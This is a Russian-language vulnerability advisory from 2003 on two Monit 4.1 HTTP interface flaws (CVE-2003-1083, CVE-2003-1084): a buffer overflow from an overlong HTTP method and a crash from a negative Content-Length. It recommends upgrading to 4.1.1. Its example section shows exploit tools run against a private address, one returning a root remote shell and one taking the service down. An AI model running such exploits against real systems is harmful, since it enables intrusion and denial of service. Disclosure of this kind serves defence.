| Дата публикации: | 25.11.2003 |
| Всего просмотров: | 1315 |
| Опасность: | Средняя |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: |
CVE-2003-1083 CVE-2003-1084 |
| Вектор эксплуатации: | Локальная сеть |
| Воздействие: | Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Monit 4.x |
| Уязвимые версии: Monit 4.1 и более ранние версии
Описание: Две уязвимости обнаружены в Monit. Злонамеренный пользователь может вызвать отказ в обслуживании или скомпрометировать уязвимую систему. 1. Удаленный атакующий может представить чрезмерно длинный HTTP метод, чтобы вызвать переполнение буфера в HTTP интерфейсе. 2. Удаленный атакующий может посать HTTP запрос с отрицательным значением в поле "Content-Length:", чтобы аварийно завершить работу целевого сервера. Пример/Эксплоит: ./xonya -t 3 -p 2812 192.168.3.12 Selected platform 3 ... Retaddr is 0xXXXXXXXX, nulladdr is 0xXXXXXXXX ... Connected to 192.168.3.12:2812 Sending the request ... Got a remote shell: Linux 2.4.20 i686 unknown uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) exit $./donit -p 2812 192.168.3.12 Connecting to 192.168.3.12:2812 ... Sending the request ... Done. $ nc -v 192.168.3.12 2812 lina.s-quadra.com [192.168.3.12] 2812 (?) : Connection refused Решение: Обновите до 4.1.1: http://www.tildeslash.com/monit/dist/ |
|
| Ссылки: | Monit 4.1 HTTP interface multiple security vulnerabilities |